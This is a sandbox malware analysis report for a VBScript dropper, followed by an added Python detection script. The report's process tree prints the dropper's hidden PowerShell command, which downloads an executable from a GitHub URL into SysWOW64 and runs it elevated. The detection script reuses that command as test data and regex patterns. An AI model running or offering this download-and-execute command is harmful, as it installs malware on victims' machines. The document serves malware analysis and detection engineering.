Analysis

max time kernel: 94s
max time network: 16s
platform: windows7_x64
resource: win7-20240729-en
resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
submitted: 06/10/2024, 01:17

Static task: static1

Behavioral task: behavioral1
  Sample: 7cbcd631a4e13b12f1577b073d66c0ff99a3b1d59589e8064cda7b1a06d7cfac.vbs
  Resource: win7-20240729-en

Behavioral task: behavioral2
  Sample: 7cbcd631a4e13b12f1577b073d66c0ff99a3b1d59589e8064cda7b1a06d7cfac.vbs
  Resource: win10v2004-20240802-en
General

Target: 7cbcd631a4e13b12f1577b073d66c0ff99a3b1d59589e8064cda7b1a06d7cfac.vbs
Size: 10KB
MD5: 8e0172134b7f15992d6464767e423996
SHA1: 071ee6dec991cbf30c9535a9cc119742dc273206
SHA256: 7cbcd631a4e13b12f1577b073d66c0ff99a3b1d59589e8064cda7b1a06d7cfac
SHA512: 350a56053a31ab1d4231cba01c4f84d9fae371dcf979ad1d7c334b92b428f1105e2ef447296ce1db0c6ddb64b9ee1f0d8db4398754d5a898f2eb163a6b451ba1
SSDEEP: 96:c8LFHzb+U5X4wrqqeH+5YoieyzgJABJ/fxrQsuO3zKA6pT8dmbTij+aUSH:cmFmU5KHJVerJABRu6N1dmnh8H

Malware Config

Extracted:
  http://github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/stubInf.exe
Signatures

Blocklisted process makes network request (3 IoCs)
  flow  pid   Process
  5     2952  powershell.exe
  6     2952  powershell.exe
  7     2952  powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run PowerShell and hide display window.
  pid   Process
  2952  powershell.exe

Drops file in System32 directory (1 IoCs)
  description   ioc                              Process
  File created  C:\Windows\SysWOW64\stubInf.exe  powershell.exe
  SysWOW64 is the 32-bit system directory on 64-bit Windows. Creating a file there requires an administrative token, so the drop succeeding shows that powershell.exe was already running with administrative rights in this sandbox.

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   Process
  2952  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2952  powershell.exe

Suspicious use of WriteProcessMemory (3 IoCs)
  description                      pid  Process      procid_target
  PID 376 wrote to memory of 2952  376  WScript.exe  30
  PID 376 wrote to memory of 2952  376  WScript.exe  30
  PID 376 wrote to memory of 2952  376  WScript.exe  30
  All three writes are from WScript.exe (376) into the powershell.exe child (2952) it had just launched, which is consistent with ordinary process creation rather than injection into an unrelated process.
Processes

C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7cbcd631a4e13b12f1577b073d66c0ff99a3b1d59589e8064cda7b1a06d7cfac.vbs"
  - Suspicious use of WriteProcessMemory
  PID: 376

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(new-object System.Net.WebClient).DownloadFile('http://github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/stubInf.exe', 'C:\Windows\SysWOW64\stubInf.exe'); Start-Process 'C:\Windows\SysWOW64\stubInf.exe' -Verb runas"
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2952
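The process tree above is a textbook script-host-to-PowerShell download cradle: WScript.exe spawns powershell.exe with the execution policy bypassed and the window hidden, WebClient.DownloadFile fetches an EXE into C:\Windows\SysWOW64, and Start-Process -Verb runas launches it with an elevation request (a UAC prompt when UAC is enabled). The script below is an added example for this page, not part of the sandbox report or the sample, showing how a detection engineer would score process-creation events for that combination and pull the URL and drop path out as IoCs. It uses Sysmon Event ID 1 field names (Image, ParentImage, CommandLine); the first event carries the command line recorded above, the other two events are constructed benign comparisons, and the tell regexes, the script-host list and the verdict thresholds are the example's own heuristics.

```python
"""Score PowerShell process-creation events for the download-and-execute pattern
seen in this report: a script host spawns powershell.exe, which fetches an EXE with
WebClient.DownloadFile, writes it under C:\\Windows\\SysWOW64 and launches it with
Start-Process -Verb runas (an elevation request).

Added example; not part of the sandbox report or the sample. The events below use
Sysmon Event ID 1 field names; only the first CommandLine comes from the report,
the other two events are constructed.
"""
import re

EVENTS = [
    {  # command line recorded in the report's process tree
        "ParentImage": r"C:\Windows\System32\WScript.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(new-object System.Net.WebClient).DownloadFile('http://github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/stubInf.exe', 'C:\Windows\SysWOW64\stubInf.exe'); Start-Process 'C:\Windows\SysWOW64\stubInf.exe' -Verb runas"''',
    },
    {  # constructed: an interactive admin listing a folder
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'"powershell.exe" -NoProfile -Command "Get-ChildItem C:\Users\Admin\Documents"',
    },
    {  # constructed: a download cradle with none of the other tells
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'''powershell.exe -Command "(New-Object Net.WebClient).DownloadString('https://example.invalid/status')"''',
    },
]

# Heuristic tells, matched against the arguments (image path removed). The short
# aliases (-ep, -ex, -w, -nop) are the unambiguous prefixes powershell.exe accepts.
TELLS = {
    "execution_policy_bypass": re.compile(r"-(?:ExecutionPolicy|ex(?:ec)?|ep)\s+Bypass", re.I),
    "hidden_window": re.compile(r"-(?:WindowStyle|w)\s+Hidden", re.I),
    "no_profile": re.compile(r"-NoP(?:rofile)?\b", re.I),
    "download_cradle": re.compile(
        r"Net\.WebClient\)?\s*\.\s*Download(?:File|String|Data)\s*\(|Invoke-WebRequest|\biwr\b|Start-BitsTransfer",
        re.I),
    "runas_elevation": re.compile(r"Start-Process\b[^;]*-Verb\s+runas", re.I),
}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}  # assumed parent list
SYSTEM_DIRS = re.compile(r"^[a-z]:\\windows\\(?:system32|syswow64)\\", re.I)
DOWNLOAD_FILE = re.compile(r"DownloadFile\s*\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)", re.I)
URL = re.compile(r"https?://[^\s'\")]+", re.I)


def strip_image(cmdline):
    """Drop the leading executable token (quoted or bare) so the image's own
    System32 path is not mistaken for a drop location in the arguments."""
    cmdline = cmdline.lstrip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[end + 1:] if end != -1 else ""
    parts = cmdline.split(None, 1)
    return parts[1] if len(parts) > 1 else ""


def score_event(event):
    """Return the tells that fired, extracted IoCs and a verdict for one event."""
    args = strip_image(event["CommandLine"])
    hits = [name for name, rx in TELLS.items() if rx.search(args)]
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    if parent in SCRIPT_HOSTS:
        hits.append("script_host_parent")
    iocs = {"urls": URL.findall(args), "drop_path": None}
    m = DOWNLOAD_FILE.search(args)
    if m:
        iocs["drop_path"] = m.group(2)
        if SYSTEM_DIRS.match(m.group(2)):
            hits.append("drop_in_system_dir")
    # A cradle on its own is common in admin tooling, so it only earns a review.
    # Combined with two or more of: hidden window, policy bypass, script-host
    # parent, system-directory drop, elevation request, it becomes an alert.
    others = [h for h in hits if h not in ("download_cradle", "no_profile")]
    if "download_cradle" in hits and len(others) >= 2:
        verdict = "alert"
    elif "download_cradle" in hits:
        verdict = "review"
    else:
        verdict = "none"
    return {"verdict": verdict, "tells": sorted(hits), "iocs": iocs}


if __name__ == "__main__":
    for ev in EVENTS:
        r = score_event(ev)
        print(r["verdict"].upper(), ev["ParentImage"].rsplit("\\", 1)[-1], "->", r["tells"], r["iocs"])
```

Run as-is it prints ALERT for the report's command line with the GitHub URL and C:\Windows\SysWOW64\stubInf.exe extracted, NONE for the folder listing, and REVIEW for the bare DownloadString. Stripping the image token first matters: powershell.exe itself lives under System32, and a naive path match on the full command line would flag every PowerShell launch as a system-directory drop.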